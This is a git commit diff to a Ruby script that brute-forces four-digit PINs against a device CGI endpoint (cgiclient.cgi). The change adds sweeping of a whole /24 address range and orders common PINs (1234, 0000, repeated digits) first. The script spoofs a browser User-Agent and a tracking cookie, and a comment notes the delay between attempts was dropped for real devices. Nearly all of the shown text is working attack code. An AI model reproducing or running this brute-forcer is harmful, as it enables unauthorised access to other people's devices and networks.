better sweep/specific support
This commit is contained in:
parent
6e06c207a4
commit
fbf855a295
@ -17,12 +17,12 @@ def get_request(uri, pin)
|
|||||||
request['Referer'] = sprintf('http://%s/login', uri.host)
|
request['Referer'] = sprintf('http://%s/login', uri.host)
|
||||||
request['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'
|
request['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'
|
||||||
|
|
||||||
# TODO saying there is a cookie set, but we're def not authed.. do we need to rotate this to avoid rate limiting?
|
# TODO determine necessity of this, given fuzzing, it's probably unnecessary
|
||||||
request['Cookie'] = sprintf('_ga=GA1.4.595462255.%s', Time.now.to_i)
|
request['Cookie'] = sprintf('_ga=GA1.4.595462255.%s', Time.now.to_i)
|
||||||
|
|
||||||
body = Array.new
|
body = Array.new
|
||||||
|
|
||||||
body << '-----------------------------7da24f2e50046' # TODO is this a magic number or randomly generated? or?
|
body << '-----------------------------7da24f2e50046' # this is a magic number: https://stackoverflow.com/questions/37701805/ie11-content-type-false-in-ie11-it-doesnt-work
|
||||||
body << 'Content-Disposition: form-data; name="file"; filename="temp.txt"' # TODO should look into what happens when we point at a different file..
|
body << 'Content-Disposition: form-data; name="file"; filename="temp.txt"' # TODO should look into what happens when we point at a different file..
|
||||||
body << 'Content-type: plain/text'
|
body << 'Content-type: plain/text'
|
||||||
body << '' # newline
|
body << '' # newline
|
||||||
@ -52,31 +52,57 @@ responses = Array.new
|
|||||||
output = sprintf('%s-logs-%s.%s.%s.json', __FILE__, address, Time.now.to_i, $$)
|
output = sprintf('%s-logs-%s.%s.%s.json', __FILE__, address, Time.now.to_i, $$)
|
||||||
|
|
||||||
if address.nil?
|
if address.nil?
|
||||||
puts sprintf('usage: %s <address>', __FILE__)
|
puts sprintf('usage: %s <ipaddress/range>', __FILE__)
|
||||||
|
puts sprintf(' %s 192.168.1.42', __FILE__)
|
||||||
|
puts sprintf(' %s 192.168.1.*', __FILE__)
|
||||||
exit 1
|
exit 1
|
||||||
end
|
end
|
||||||
|
|
||||||
1.upto(254) do |octet|
|
mode = address.match(/^(?:\d{1,3}){3}\.\d{1,3}$/) ? :ip : :range
|
||||||
base = $1 if address.match(/((?:\d{1,3}){3}\.)/)
|
targets = Array.new
|
||||||
ip = sprintf('%s.%s', base, octet)
|
|
||||||
9999.downto(0) do |i|
|
if mode.eql?(:ip)
|
||||||
# TODO we should prioritize 0000, 1234, etc
|
targets << address
|
||||||
|
elsif mode.eql?(:range)
|
||||||
|
base = address.split('.')[0..2].join('.')
|
||||||
|
1.upto(254) do |octet|
|
||||||
|
targets << sprintf('%s.%s', base, octet)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
pins = 9999.downto(0).to_a
|
||||||
|
prioritized = [1234, 2546, 1739, 9876, 1425, 4152] # commonly used PINs
|
||||||
|
|
||||||
|
# commonly used PINs that follow a pattern
|
||||||
|
0.upto(9) do |i|
|
||||||
|
prioritized << i * 1111
|
||||||
|
end
|
||||||
|
|
||||||
|
prioritized.each do |p|
|
||||||
|
pins.delete(p)
|
||||||
|
pins.unshift(p)
|
||||||
|
end
|
||||||
|
|
||||||
|
targets.each do |target|
|
||||||
|
|
||||||
|
pins.each do |i|
|
||||||
|
|
||||||
pin = sprintf('%04d', i)
|
pin = sprintf('%04d', i)
|
||||||
|
|
||||||
begin
|
begin
|
||||||
url = sprintf('http://%s/cgi-bin/cgiclient.cgi?CGI.RequestProperties=', address)
|
url = sprintf('http://%s/cgi-bin/cgiclient.cgi?CGI.RequestProperties=', target)
|
||||||
|
|
||||||
puts sprintf('trying pin[%s]', pin)
|
puts sprintf('trying pin[%s]', pin)
|
||||||
|
|
||||||
response = check_pin(url, pin)
|
response = check_pin(url, pin)
|
||||||
|
|
||||||
responses << response
|
responses << response
|
||||||
|
|
||||||
|
# <properties sys.validate-password="0"></properties>
|
||||||
if response.body.match(/1/)
|
if response.body.match(/1/)
|
||||||
puts sprintf('INFO: found the pin[%s]', pin)
|
puts sprintf('INFO: found the pin[%s]', pin)
|
||||||
break
|
break
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# this was necessary when testing against a local server, but not against real devices
|
||||||
#sleep 1 if (i % 100).eql?(0)
|
#sleep 1 if (i % 100).eql?(0)
|
||||||
|
|
||||||
rescue => e
|
rescue => e
|
||||||
@ -87,30 +113,6 @@ ip = sprintf('%s.%s', base, octet)
|
|||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
# marshalling the data, at least until we know what we're looking for
|
|
||||||
begin
|
|
||||||
|
|
||||||
content = Array.new
|
|
||||||
responses.each do |response|
|
|
||||||
hash = {
|
|
||||||
:code => response.code,
|
|
||||||
:body => response.body,
|
|
||||||
:size => response.body.size,
|
|
||||||
}
|
|
||||||
|
|
||||||
content << hash
|
|
||||||
end
|
|
||||||
|
|
||||||
File.open(output, 'w') do |fh|
|
|
||||||
fh.print(JSON.pretty_generate(content))
|
|
||||||
end
|
|
||||||
|
|
||||||
puts sprintf('SUCCESS: wrote output to[%s]', output)
|
|
||||||
rescue => e
|
|
||||||
puts sprintf('ERROR: [%s]: %s[%s]', e.message, "\n", e.backtrace.join("\n"))
|
|
||||||
end
|
|
||||||
|
|
||||||
# TODO something better here
|
# TODO something better here
|
||||||
errors.each do |e|
|
errors.each do |e|
|
||||||
puts sprintf('ERROR: pin[%s] trace[%s]', e[:pin], e[:exception])
|
puts sprintf('ERROR: pin[%s] trace[%s]', e[:pin], e[:exception])
|
||||||
|
Loading…
Reference in New Issue
Block a user